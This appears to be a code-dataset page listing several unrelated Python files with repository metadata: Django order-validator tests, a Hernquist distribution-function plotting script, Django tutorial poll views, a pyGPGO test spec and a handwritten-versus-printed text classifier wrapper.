serializer = mock.Mock()
company = serializer.instance.company
new_contact = mock.Mock(company=company)
validator = ContactWorksAtCompanyValidator()
data = {
'contact': new_contact,
'company': company,
}
try:
validator(data, serializer)
except Exception:
pytest.fail('Should not raise a validator error.')
def test_contact_not_from_company(self):
"""
        Test that if the contact specified in data doesn't work
at the company specified in data, the validation fails.
"""
serializer = mock.Mock()
company = serializer.instance.company
new_contact = mock.Mock() # doesn't work at `company`
validator = ContactWorksAtCompanyValidator()
data = {
'contact': new_contact,
'company': company,
}
with pytest.raises(ValidationError):
validator(data, serializer)
def test_with_different_field_names(self):
"""
Test that the validation passes when using different field names.
"""
serializer = mock.Mock()
company = serializer.instance.company
new_main_contact = mock.Mock(company=company)
validator = ContactWorksAtCompanyValidator(
contact_field='main_contact',
company_field='main_company',
)
data = {
'main_contact': new_main_contact,
'main_company': company,
}
try:
validator(data, serializer)
except Exception:
pytest.fail('Should not raise a validator error.')
@pytest.mark.django_db
class TestAssigneesFilledInSubValidator:
"""Tests for the AssigneesFilledInSubValidator."""
def test_no_assignees_fails(self):
"""Test that the validation fails if the order doesn't have any assignees."""
order = OrderFactory(assignees=[])
validator = AssigneesFilledInSubValidator()
with pytest.raises(ValidationError) as exc:
validator(order=order)
assert exc.value.detail == {
'assignees': ['You need to add at least one assignee.'],
}
def test_no_lead_assignee_fails(self):
"""Test that the validation fails if there's no lead assignee."""
order = OrderFactory()
order.assignees.update(is_lead=False)
validator = AssigneesFilledInSubValidator()
with pytest.raises(ValidationError) as exc:
validator(order=order)
assert exc.value.detail == {
'assignee_lead': ['You need to set a lead assignee.'],
}
def test_no_estimated_time_fails(self):
"""
Test that the validation fails if the combined estimated time of the assignees
is zero.
"""
order = OrderFactory()
order.assignees.update(estimated_time=0)
validator = AssigneesFilledInSubValidator()
with pytest.raises(ValidationError) as exc:
validator(order=order)
assert exc.value.detail == {
'assignee_time': ['The total estimated time cannot be zero.'],
}
def test_non_zero_estimated_time_succeeds(self):
"""
Test that the validation succeeds if the combined estimated time of the assignees
is greater than zero.
"""
order = OrderFactory()
assert order.assignees.aggregate(sum=Sum('estimated_time'))['sum'] > 0
validator = AssigneesFilledInSubValidator()
try:
validator(order=order)
except Exception:
pytest.fail('Should not raise a validator error.')
@pytest.mark.django_db
class TestOrderDetailsFilledInSubValidator:
"""Tests for the OrderDetailsFilledInSubValidator."""
@pytest.mark.parametrize('values_as_data', (True, False))
def test_incomplete_order(self, values_as_data):
"""
Test that an incomplete order doesn't pass the validation.
Test both scenarios:
- with fields on the instance (values_as_data=False)
- with fields as values in the data param (values_as_data=True)
"""
order_fields = {
'primary_market': None,
'description': '',
'delivery_date': None,
'vat_status': '',
}
order_m2m_fields = {
'service_types': [],
}
if values_as_data:
order = Order()
data = {**order_fields, **order_m2m_fields}
else:
order = Order(**order_fields)
for k, v in order_m2m_fields.items():
getattr(order, k).set(v)
data = {}
validator = OrderDetailsFilledInSubValidator()
with pytest.raises(ValidationError) as exc:
validator(data=data, order=order)
all_fields = list(order_fields) + list(order_m2m_fields)
assert exc.value.detail == {
**{field: ['This field is required.'] for field in all_fields},
'assignees': ['You need to add at least one assignee.'],
}
@pytest.mark.parametrize('values_as_data', (True, False))
def test_complete_order(self, values_as_data):
"""
Test that a complete order passes the validation.
Test both scenarios:
- with fields on the instance (values_as_data=False)
- with fields as values in the data param (values_as_data=True)
"""
random_values = OrderFactory() # used only to set up the related props easily
order_fields = {
'primary_market': random_values.primary_market,
'service_types': random_values.service_types.all(),
'description': random_values.description,
'delivery_date': random_values.delivery_date,
'vat_status': random_values.vat_status,
}
order = OrderFactory(**(order_fields if not values_as_data else {}))
data = order_fields if values_as_data else {}
validator = OrderDetailsFilledInSubValidator()
try:
validator(data=data, order=order)
except Exception:
pytest.fail('Should not raise a validator error.')
def test_validation_errors_appended(self):
"""
Test that if a field gets more than one error during the validation,
the errors are appended to the same list and not overridden by other validators.
"""
order = OrderFactory()
with mock.patch.object(
OrderDetailsFilledInSubValidator,
'get_extra_validators',
) as get_extra_validators:
# trigger a second validation error on the same field
get_extra_validators.return_value = [
mock.Mock(
side_effect=ValidationError({
'description': ['A different error...'],
}),
),
]
validator = OrderDetailsFilledInSubValidator()
with pytest.raises(ValidationError) as exc:
validator(
data={
'description': '',
},
order=order,
)
assert exc.value.detail == {
'description': [
'This field is required.',
'A different error...',
],
}
@pytest.mark.django_db
class TestNoOtherActiveQuoteExistsSubValidator:
"""Tests for the NoOtherActiveQuoteExistsSubValidator."""
def test_with_existing_active_quote(self):
"""Test that if there's already an active quote, the validation fails."""
order = OrderWithOpenQuoteFactory()
validator = NoOtherActiveQuoteExistsSubValidator()
with pytest.raises(APIConflictException):
validator(order=order)
def test_without_any_active_quote(self):
"""Test that if there isn't any active quote, the validation passes."""
order = OrderFactory()
validator = NoOtherActiveQuoteExistsSubValidator()
try:
validator(order=order)
except Exception:
pytest.fail('Should not raise a validator error.')
def test_with_cancelled_quote(self):
"""Test that if there is a cancelled quote, the validation passes."""
order = OrderWithCancelledQuoteFactory()
validator = NoOtherActiveQuoteExistsSubValidator()
try:
validator(order=order)
except Exception:
pytest.fail('Should not raise a validator error.')
@pytest.mark.django_db
class TestOrderInStatusSubValidator:
"""Tests for the OrderInStatusSubValidator."""
def test_validation_passes(self):
"""
Test that the validation passes if order.status is one of the allowed statuses.
"""
order = OrderFactory(status=OrderStatus.complete)
validator = OrderInStatusSubValidator(
allowed_statuses=(
OrderStatus.draft,
OrderStatus.complete,
OrderStatus.cancelled,
),
)
try:
validator(order=order)
except Exception:
pytest.fail('Should not raise a validator error.')
def test_validation_fails(self):
"""
Test that the validation fails if order.status is NOT one of the allowed statuses.
"""
order = OrderFactory(status=OrderStatus.complete)
validator = OrderInStatusSubValidator(
allowed_statuses=(
OrderStatus.draft,
OrderStatus.cancelled,
),
)
with pytest.raises(APIConflictException):
validator(order=order)
def test_order_not_required(self):
"""
Test that if order_required == False and the order passed in is None,
the validation passes.
"""
validator = OrderInStatusSubValidator(
allowed_statuses=(
OrderStatus.draft,
OrderStatus.complete,
OrderStatus.cancelled,
),
order_required=False,
)
try:
validator()
except Exception:
pytest.fail('Should not raise a validator error.')
@pytest.mark.django_db
class TestOrderInStatusValidator:
"""Tests for the OrderInStatusValidator."""
@pytest.mark.parametrize(
'serializer_factory',
(
lambda order: mock.Mock(instance=order, context={}),
lambda order: mock.Mock(context={'order': order}),
),
)
def test_validation_passes(self, serializer_factory):
"""
Test that the validation passes if order.status is one of the allowed statuses.
"""
order = OrderFactory(status=OrderStatus.complete)
validator = OrderInStatusValidator(
allowed_statuses=(
OrderStatus.draft,
OrderStatus.complete,
OrderStatus.cancelled,
),
)
serializer = serializer_factory(order)
try:
validator({}, serializer)
except Exception:
pytest.fail('Should not raise a validator error.')
@pytest.mark.parametrize(
'serializer_factory',
(
lambda order: mock.Mock(instance=order, context={}),
lambda order: mock.Mock(context={'order': order}),
),
)
def test_validation_fails(self, serializer_factory):
"""
Test that the validation fails if order.status is NOT one of the allowed statuses.
"""
order = OrderFactory(status=OrderStatus.complete)
validator = OrderInStatusValidator(
allowed_statuses=(
OrderStatus.draft,
OrderStatus.cancelled,
),
)
serializer = serializer_factory(order)
with pytest.raises(APIConflictException):
validator({}, serializer)
def test_order_not_required(self):
"""
Test that if order_required == False and the order passed in is None,
the validation passes.
"""
validator = OrderInStatusValidator(
allowed_statuses=(
OrderStatus.draft,
OrderStatus.complete,
OrderStatus.cancelled,
),
order_required=False,
)
serializer = mock.Mock(instance=None, context={})
try:
validator({}, serializer)
except Exception:
pytest.fail('Should not raise a validator error.')
class TestVATSubValidator:
"""Tests for the VATSubValidator."""
@pytest.mark.parametrize('values_as_data', (True, False))
def test_nothing_specified_fails(self, values_as_data):
"""
Test that if none of the vat fields are specified, it raises a ValidationError.
Test both scenarios:
- with fields on the instance (values_as_data=False)
- with fields as values in the data param (values_as_data=True)
"""
order_fields = {
'vat_status': '',
'vat_number': '',
'vat_verified': None,
}
order = Order(**(order_fields if not values_as_data else {}))
data = order_fields if values_as_data else {}
validator = VATSubValidator()
with pytest.raises(ValidationError) as exc:
validator(data=data, order=order)
assert exc.value.detail == {'vat_status': ['This field is required.']}
@pytest.mark.parametrize('values_as_data', (True, False))
def test_only_status_eu_specified_fails(self, values_as_data):
"""
Test that if only vat_status = eu is specified, it raises a ValidationError
as vat_verified (true or false) has to be specified as well.
Test both scenarios:
- with fields on the instance (values_as_data=False)
- with fields as values in the data param (values_as_data=True)
"""
order_fields = {
'vat_status': VATStatus.eu,
'vat_number': '',
'vat_verified': None,
}
order = Order(**(order_fields if not values_as_data else {}))
data = order_fields if values_as_data else {}
validator = VATSubValidator()
with pytest.raises(ValidationError) as exc:
validator(data=data, order=order)
assert exc.value.detail == {'vat_verified': ['This field is required.']}
@pytest.mark.parametrize('values_as_data', (True, False))
def test_only_status_eu_verified_true_specified_fails(self, values_as_data):
"""
Test that if vat_status = eu and vat_verified = True but vat_number is not specified,
it raises a ValidationError.
Test both scenarios:
- with fields on the instance (values_as_data=False)
- with fields as values in the data param (values_as_data=True)
"""
order_fields = {
'vat_status': VATStatus.eu,
'vat_number': '',
'vat_verified': True,
}
order = Order(**(order_fields if not values_as_data else {}))
data = order_fields if values_as_data else {}
validator = VATSubValidator()
with pytest.raises(ValidationError) as exc:
validator(data=data, order=order)
assert exc.value.detail == {'vat_number': ['This field is required.']}
@pytest.mark.parametrize('values_as_data', (True, False))
def test_complete_verified_eu_vat_succeeds(self, values_as_data):
"""
Test that if vat_status = eu, vat_verified = True and vat_number is specified,
the validation passes.
Test both scenarios:
- with fields on the instance (values_as_data=False)
- with fields as values in the data param (values_as_data=True)
"""
order_fields = {
'vat_status': VATStatus.eu,
'vat_number': '0123456789',
'vat_verified': True,
}
order = Order(**(order_fields if not values_as_data else {}))
data = order_fields if values_as_data else {}
validator = VATSubValidator()
try:
validator(data=data, order=order)
except Exception:
pytest.fail('Should not raise a validator error.')
@pytest.mark.parametrize('values_as_data', (True, False))
def test_only_status_eu_verified_false_specified_succeeds(self, values_as_data):
"""
Test that if vat_status = eu, vat_verified = False and vat_number is not specified,
the validation passes and vat_number is not required when vat_verified is False.
Test both scenarios:
- with fields on the instance (values_as_data=False)
- with fields as values in the data param (values_as_data=True)
"""
order_fields = {
'vat_status': VATStatus.eu,
'vat_number': '',
'vat_verified': False,
}
order = Order(**(order_fields if not values_as_data else {}))
data = order_fields if values_as_data else {}
validator = VATSubValidator()
try:
validator(data=data, order=order)
except Exception:
pytest.fail('Should not raise a validator error.')
@pytest.mark.parametrize('values_as_data', (True, False))
@pytest.mark.parametrize('vat_status', (VATStatus.outside_eu, VATStatus.uk))
def test_only_status_non_eu_succeeds(self, values_as_data, vat_status):
"""
Test that if vat_status != eu, the validation passes even if the other
fields are empty.
Test both scenarios:
- with fields on the instance (values_as_data=False)
- with fields as values in the data param (values_as_data=True)
"""
order_fields = {
'vat_status': vat_status,
'vat_number': '',
'vat_verified': None,
}
order = Order(**(order_fields if not values_as_data else {}))
data = order_fields if values_as_data else {}
validator = VATSubValidator()
try:
validator(data=data, order=order)
except Exception:
pytest.fail('Should not raise a validator error.')
class TestCompletableOrderSubValidator:
"""Tests for the CompletableOrderSubValidator."""
def test_ok_with_all_actual_time_fields_set(self):
"""
Test that the validation succeeds when all assignee.actual_time fields are set.
"""
order = mock.MagicMock()
order.assignees.all.return_value = (
mock.MagicMock(actual_time=100), mock.MagicMock(actual_time=0),
)
validator = CompletableOrderSubValidator()
try:
validator(order=order)
except Exception:
pytest.fail('Should not raise a validator error.')
def test_fails_if_not_all_actual_time_fields_set(self):
"""
Test that the validation fails if not all assignee.actual_time fields are set.
"""
order = mock.MagicMock()
order.assignees.all.return_value = (
mock.MagicMock(actual_time=100), mock.MagicMock(actual_time=None),
)
validator = CompletableOrderSubValidator()
with pytest.raises(ValidationError) as exc:
validator(order=order)
assert exc.value.detail == {
'non_field_errors': (
'You must set the actual time for all assignees '
'to complete this order.'
),
}
class TestCancellableOrderSubValidator:
"""Tests for the CancellableOrderSubValidator."""
@pytest.mark.parametrize(
'order_status,force,should_pass',
(
# with force=False
(OrderStatus.draft, False, True),
(OrderStatus.quote_awaiting_acceptance, False, True),
(OrderStatus.quote_accepted, False, False),
(OrderStatus.paid, False, False),
(OrderStatus.complete, False, False),
(OrderStatus.cancelled, False, False),
# with force=True
(OrderStatus.draft, True, True),
(OrderStatus.quote_awaiting_acceptance, True, True),
(OrderStatus.quote_accepted, True, True),
(OrderStatus.paid, True, True),
(OrderStatus.complete, True, False),
(OrderStatus.cancelled, True, False),
),
)
def test_validation(self, order_status, force, should_pass):
"""Test the validator with different order status and force values."""
order = Order(status=order_status)
validator = CancellableOrderSubValidator(force=force)
if should_pass:
validator(order=order)
else:
with pytest.raises(APIConflictException):
validator(order=order)
@pytest.mark.parametrize(
'order_status,expected_status,res',
(
(OrderStatus.draft, OrderStatus.draft, True),
(OrderStatus.draft, OrderStatus.paid, False),
),
)
def test_order_in_status_rule(order_status, expected_status, res):
"""Tests for OrderInStatusRule."""
order = mock.Mock(status=order_status)
combiner = mock.Mock()
combiner.serializer.context = {'order': order}
rule = OrderInStatusRule(expected_status)
assert rule(combiner) == res
class TestOrderEditableFieldsValidator:
"""Tests for the OrderEditableFieldsValidator."""
@pytest.mark.parametrize(
'order_status,mapping,data,should_pass',
(
# allowed field => OK
(
OrderStatus.draft,
{OrderStatus.draft: {'description'}},
{'description': 'lorem ipsum'},
True,
),
# disallowed field => Fail
(
OrderStatus.draft,
{OrderStatus.draft: {'contact'}},
{'description': 'lorem ipsum'},
False,
),
# status not in mapping => OK
(
OrderStatus.draft,
{OrderStatus.paid: {'contact'}},
{'description': 'lorem ipsum'},
True,
),
# disallowed field didn't change => OK
(
OrderStatus.draft,
{OrderStatus.draft: {'contact'}},
{'description': 'original description'},
True,
),
# nothing allowed => Fail
(
OrderStatus.draft,
{OrderStatus.draft: {}},
{'description': 'lorem ipsum'},
False,
),
),
)
def test_validation_with_order(self, order_status, mapping, data, should_pass):
"""Test the validator with different order status, mapping and data."""
order = Order(
status=order_status,
description='original description',
)
serializer = mock.Mock(instance=order)
validator = OrderEditableFieldsValidator(mapping)
if should_pass:
validator(data, serializer)
else:
with pytest.raises(ValidationError):
validator(data, serializer)
def test_validation_passes_on_creation(self):
"""Test that the validation passes if we are creating the order instead of editing it."""
serializer = mock.Mock(instance=None)
validator = OrderEditableFieldsValidator({OrderStatus.paid: {'contact'}})
validator({'description': 'lorem ipsum'}, serializer)
| 32.876494
| 97
| 0.605025
|
f2ebd39d561cc31e1ad600b9e13e6f9160415c77
| 6,382
|
py
|
Python
|
figures/fig1_iso.py
|
aneeshnaik/HernquistFlows
|
7f81f9b47297b115ae6b593593aac59afafc48b3
|
[
"MIT"
] | null | null | null |
figures/fig1_iso.py
|
aneeshnaik/HernquistFlows
|
7f81f9b47297b115ae6b593593aac59afafc48b3
|
[
"MIT"
] | null | null | null |
figures/fig1_iso.py
|
aneeshnaik/HernquistFlows
|
7f81f9b47297b115ae6b593593aac59afafc48b3
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Figure 1: Isotropic Hernquist DF.
Created: May 2021
Author: A. P. Naik
"""
import sys
import numpy as np
import matplotlib.pyplot as plt
import copy
from os.path import exists
sys.path.append("../src")
from constants import M_sun, kpc, G, pi
from hernquist import calc_DF_iso
from ml import load_flow, calc_DF_ensemble
def get_f_exact(rgrid, vgrid, M, a):
"""Get exact Hernquist DF evaluated on r/v grids."""
# deproject grids into 6D
N_bins = rgrid.shape[0]
dr = np.diff(rgrid[0, :], axis=0)[0]
dv = np.diff(vgrid[:, 0], axis=0)[0]
x = rgrid.reshape(N_bins**2)
vx = vgrid.reshape(N_bins**2)
zeroes = np.zeros_like(x)
q = np.stack((x, zeroes, zeroes), axis=-1)
p = np.stack((vx, zeroes, zeroes), axis=-1)
# evaluate DF
f_exact = calc_DF_iso(q, p, M, a).reshape(N_bins, N_bins)
# renormalise; expected fraction of particles in each bin
f_exact = 16 * pi**2 * f_exact * rgrid**2 * vgrid**2 * dr * dv
return f_exact
def get_f_data(r_bin_edges, v_bin_edges):
"""Get mock Hernquist sample histogrammed into r v grids."""
# load data
data = np.load('../data/hq_iso_orig.npz')
pos = data['pos']
vel = data['vel']
# get histogram
r = np.linalg.norm(pos, axis=-1)
v = np.linalg.norm(vel, axis=-1)
bins = [r_bin_edges / kpc, v_bin_edges / 1000]
H, _, _ = np.histogram2d(r / kpc, v / 1000, bins=bins)
f_data = H.T / 1e+6
return f_data
def get_f_model(rgrid, vgrid, M, a):
"""Get reconstructed Hernquist DF evaluated on r/v grids."""
# deproject grids into 6D
N_bins = rgrid.shape[0]
dr = np.diff(rgrid[0, :], axis=0)[0]
dv = np.diff(vgrid[:, 0], axis=0)[0]
x = rgrid.reshape(N_bins**2)
vx = vgrid.reshape(N_bins**2)
zeroes = np.zeros_like(x)
q = np.stack((x, zeroes, zeroes), axis=-1)
p = np.stack((vx, zeroes, zeroes), axis=-1)
# units
u_q = 10 * a
u_p = np.sqrt(2 * G * M / a)
u_f = u_q**3 * u_p**3
# load flows
n_flows = 30
flows = []
for i in range(n_flows):
fname = f"../nflow_models/hq_iso_orig/{i}_best.pth"
flows.append(load_flow(fname, 6, 8, 64))
# evaluate DF
f_model = calc_DF_ensemble(q, p, u_q, u_p, flows).reshape(N_bins, N_bins)
# renormalise; expected fraction of particles in each bin
f_model = 16 * pi**2 * f_model * rgrid**2 * vgrid**2 * dr * dv / u_f
return f_model
if __name__ == '__main__':
# Hernquist params and scaling units
M = 1e+10 * M_sun
a = 5 * kpc
u_pos = 10 * a
u_vel = np.sqrt(2 * G * M / a)
# grid dims
r_max = 5.5 * a
v_max = np.sqrt(2 * G * M / a)
N_bins = 128
# check if plot data exists, otherwise generate
dfile = "fig1_data.npz"
if not exists(dfile):
# define r/v bins in which to evaluate DF
r_bin_edges = np.linspace(0, r_max, N_bins + 1)
v_bin_edges = np.linspace(0, v_max, N_bins + 1)
r_cen = 0.5 * (r_bin_edges[1:] + r_bin_edges[:-1])
v_cen = 0.5 * (v_bin_edges[1:] + v_bin_edges[:-1])
rgrid, vgrid = np.meshgrid(r_cen, v_cen)
dr = r_max / N_bins
dv = v_max / N_bins
# f_ref
x0 = np.array([a, 0, 0])
v0 = np.array([v_max / 4, 0, 0])
f_ref = calc_DF_iso(x0, v0, M, a)
f_ref = 16 * pi**2 * f_ref * a**2 * (v_max / 4)**2 * dr * dv
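        # f_ref is the per-bin fraction at the reference point (r = a, v = v_max / 4);
        # the exact, data and model grids below are all normalised by this value.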
# get various DFs
f_exact = get_f_exact(rgrid, vgrid, M, a) / f_ref
f_data = get_f_data(r_bin_edges, v_bin_edges) / f_ref
f_model = get_f_model(rgrid, vgrid, M, a) / f_ref
# calculate residuals
with np.errstate(divide='ignore', invalid='ignore'):
res = np.divide((f_model - f_exact), f_exact)
# save data file
np.savez(
dfile, f_exact=f_exact, f_data=f_data, f_model=f_model, res=res
)
else:
# load data file
data = np.load(dfile)
f_exact = data['f_exact']
f_model = data['f_model']
f_data = data['f_data']
res = data['res']
# set up figure
fig = plt.figure(figsize=(6.9, 3), dpi=150)
left = 0.065
right = 0.98
bottom = 0.125
top = 0.83
dX = (right - left) / 4
dY = (top - bottom)
CdY = 0.05
# plot settings
plt.rcParams['text.usetex'] = True
plt.rcParams['font.family'] = 'serif'
plt.rcParams['font.size'] = 9
plt.rcParams['ytick.labelsize'] = 8
plt.rcParams['xtick.labelsize'] = 8
labels = ['Exact', 'Data', 'Model', 'Residuals']
cmap = copy.copy(plt.cm.bone)
cmap.set_under('white')
vmin = 0.00001
vmax = 1.3
extent = [0, r_max / a, 0, 1]
iargs1 = {'origin': 'lower', 'cmap': cmap, 'vmin': vmin, 'vmax': vmax,
'extent': extent, 'aspect': 'auto'}
iargs2 = {'origin': 'lower', 'extent': extent, 'vmin': -0.75, 'vmax': 0.75,
'cmap': 'Spectral_r', 'aspect': 'auto'}
# loop over panels
for i in range(4):
# set up axes
ax = fig.add_axes([left + i * dX, top - dY, dX, dY])
# get relevant DF
if i == 0:
f = np.copy(f_exact)
elif i == 1:
f = np.copy(f_data)
elif i == 2:
f = np.copy(f_model)
else:
f = np.copy(res)
# plot DF
if i == 3:
im1 = ax.imshow(res, **iargs2)
else:
im0 = ax.imshow(f, **iargs1)
# text
ax.text(0.97, 0.96, labels[i], ha='right', va='top',
transform=ax.transAxes)
# ticks, axis labels etc.
ax.tick_params(top=True, right=True, direction='inout')
if i == 0:
ax.set_ylabel(r"$v\ /\ v_\mathrm{esc}(r=0)$")
else:
ax.tick_params(labelleft=False)
if i == 2:
ax.set_xlabel(r"$r\ /\ a$")
ax.xaxis.set_label_coords(0, -0.1)
# colourbars
cax0 = fig.add_axes([left, top, 3 * dX, CdY])
cax1 = fig.add_axes([left + 3 * dX, top, dX, CdY])
plt.colorbar(im0, cax=cax0, orientation='horizontal')
plt.colorbar(im1, cax=cax1, orientation='horizontal')
cax0.set_xlabel(r"$F / F_\mathrm{ref}$")
cax1.set_xlabel(r"Model / Exact - 1")
for cax in [cax0, cax1]:
cax.xaxis.set_ticks_position('top')
cax.xaxis.set_label_position('top')
# save
fig.savefig("fig1_iso.pdf")
| 29.275229
| 79
| 0.56205
|
890be8cb708e51757880132205b02b1b17afa102
| 1,555
|
py
|
Python
|
django_1.8_tutorial/mysite/polls/views.py
|
TecKnow/learning
|
71d1ddf9d580027ecc62a067581da378a9e85f6d
|
[
"BSD-3-Clause"
] | null | null | null |
django_1.8_tutorial/mysite/polls/views.py
|
TecKnow/learning
|
71d1ddf9d580027ecc62a067581da378a9e85f6d
|
[
"BSD-3-Clause"
] | null | null | null |
django_1.8_tutorial/mysite/polls/views.py
|
TecKnow/learning
|
71d1ddf9d580027ecc62a067581da378a9e85f6d
|
[
"BSD-3-Clause"
] | null | null | null |
from django.shortcuts import get_object_or_404, render
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.utils import timezone
from django.views import generic
from .models import Choice, Question
class IndexView(generic.ListView):
template_name = 'polls/index.html'
context_object_name = 'latest_question_list'
def get_queryset(self):
"""Return the last five published questions."""
return Question.objects.filter(
pub_date__lte=timezone.now()
).order_by('-pub_date')[:5]
class DetailView(generic.DetailView):
model = Question
template_name = 'polls/detail.html'
def get_queryset(self):
"""Excludes any questions that aren't published yet."""
return Question.objects.filter(pub_date__lte=timezone.now())
class ResultsView(generic.DetailView):
model = Question
template_name = 'polls/results.html'
def vote(request, question_id):
p = get_object_or_404(Question, pk=question_id)
try:
selected_choice = p.choice_set.get(pk=request.POST['choice'])
except(KeyError, Choice.DoesNotExist):
return render(request,
'polls/detail.html',
{'question': p,
'error_message': "You didn't select a choice."
})
else:
selected_choice.votes += 1
selected_choice.save()
return HttpResponseRedirect(reverse('polls:results',
args=(p.id,)))
| 31.1
| 69
| 0.649518
|
293f83cbe614908d50284bb095b8cc08b77023d8
| 1,618
|
py
|
Python
|
tool/testspec_1c718d7f2bdb95d407b27412b25471c762355832.py
|
uiuc-arc/tera
|
9ceece9aa29fd58903c6e8fa5e65fce555f55d7c
|
[
"MIT"
] | 2
|
2021-07-01T11:57:28.000Z
|
2022-03-29T19:29:01.000Z
|
tool/testspec_c21120ffd974029485877dcebafb2c0b930e1f16.py
|
uiuc-arc/tera
|
9ceece9aa29fd58903c6e8fa5e65fce555f55d7c
|
[
"MIT"
] | null | null | null |
tool/testspec_c21120ffd974029485877dcebafb2c0b930e1f16.py
|
uiuc-arc/tera
|
9ceece9aa29fd58903c6e8fa5e65fce555f55d7c
|
[
"MIT"
] | null | null | null |
from src.lib.TestSpec import Spec
from src.lib.AssertSpec import AssertSpec
from src.lib.AssertType import AssertType
from src.lib.Param import Param
from src.lib.ParamType import ParamType
from src.lib.Test import Test
import libraries
testspecs = [Spec(
repo="pyGPGO",
filename="{0}/projects/pyGPGO/tests/test_GPGO.py".format(
libraries.PROJECT_DIR),
classname="none",
testname="test_GPGO_mcmc",
params=[
Param(
name="niter",
param_line=30,
param_col=56,
param_type=ParamType.ITER,
default_val=100,
value_range=[1, 100],
steps=1
),
Param(
name="max_iter",
param_line=34,
param_col=22,
param_type=ParamType.ITER,
default_val=10,
value_range=[1, 10],
steps=1
),
],
assertions=[
AssertSpec(
test=Test(testname=None,
classname=None,
filename="{0}/projects/pyGPGO/tests/test_GPGO.py".format(
libraries.PROJECT_DIR)
),
line=36,
col_offset=-1,
assert_type=AssertType.ASSERT_ALLCLOSE,
assert_string="np.testing.assert_allclose(res['x'], 0.75, atol=0.05)",
args=[]
)
],
branchname="before_1c718d7f2bdb95d407b27412b25471c762355832"
)]
| 30.528302
| 86
| 0.495674
|
07b9d0bdcfb8330466edea9deb7cfc89c37bf0c0
| 2,985
|
py
|
Python
|
textkind/classify.py
|
caltechlibrary/documentarist
|
055ad42f623c7affb584a6004e1bdba73d6312ac
|
[
"BSD-3-Clause"
] | 10
|
2020-04-27T19:12:14.000Z
|
2022-02-11T07:06:17.000Z
|
textkind/classify.py
|
caltechlibrary/documentarist
|
055ad42f623c7affb584a6004e1bdba73d6312ac
|
[
"BSD-3-Clause"
] | null | null | null |
textkind/classify.py
|
caltechlibrary/documentarist
|
055ad42f623c7affb584a6004e1bdba73d6312ac
|
[
"BSD-3-Clause"
] | 2
|
2020-04-27T19:12:21.000Z
|
2021-03-15T10:47:16.000Z
|
'''
classify.py: interface to classifier engine
Authors
-------
Michael Hucka <mhucka@caltech.edu> -- Caltech Library
Copyright
---------
Copyright (c) 2020 by the California Institute of Technology. This code
is open-source software released under a 3-clause BSD license. Please see the
file "LICENSE" for more information.
'''
from math import exp
from os import path
import pickle
from PIL import Image
from sidetrack import log, logr
import sys
sys.path.append('../common')
from common.ui import UI, inform, warn, alert, alert_fatal
from common.exceptions import *
sys.path.append('printed_vs_handwritten')
from printed_vs_handwritten import ocrd_typegroups_classifier
from printed_vs_handwritten.ocrd_typegroups_classifier.typegroups_classifier import TypegroupsClassifier
# Constants.
# .............................................................................
_TGC_MODEL_FILE = 'classifier.tgc'
# Class definitions.
# .............................................................................
class TextKindClassifier():
def __init__(self):
pickled_class = path.join('printed_vs_handwritten',
'ocrd_typegroups_classifier',
'models', 'classifier.tgc')
self._classifier = TypegroupsClassifier.load(pickled_class)
def classify(self, inputs):
'''Analyzes images for handwritten or printed text.
If given a single image or file, analyzes it and returns a single
result. If given a list, returns an iterator over the results of
analyzing each individual image or file.
'''
if isinstance(inputs, (list, tuple)):
return self.classify_list(inputs)
elif isinstance(inputs, Image.Image):
return self.classify_image(inputs)
else:
return self.classify_file(inputs)
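    # Hypothetical usage sketch (the file names are placeholders, not part of this module):
    #   classifier = TextKindClassifier()
    #   single = classifier.classify('page.png')            # dict with 'text kind' and scores
    #   batch  = classifier.classify(['a.png', 'b.png'])    # iterator of such dicts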
def classify_list(self, inputs):
for item in inputs:
yield self.classify(item)
def classify_file(self, file):
if __debug__: log(f'classifying file {file}')
with Image.open(file, 'r') as image:
return self.classify_image(image)
def classify_image(self, image):
file = image.filename if hasattr(image, 'filename') else None
if __debug__: log(f'classifying image {image} (from {file})')
# The classifier has a hardwired assumption that the inputs have
# 3 channels. If we get a grayscale image, we have to convert it.
image = image.convert('RGB')
data = self._classifier.classify(image, 75, 64, False)
kind = 'printed' if data['printed'] > data['handwritten'] else 'handwritten'
results = {'text kind': kind,
'printed': data['printed'],
'handwritten': data['handwritten']}
if file:
results['file'] = file
if __debug__: log('image classification results = {}', results)
return results
| 31.421053
| 106
| 0.621776
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.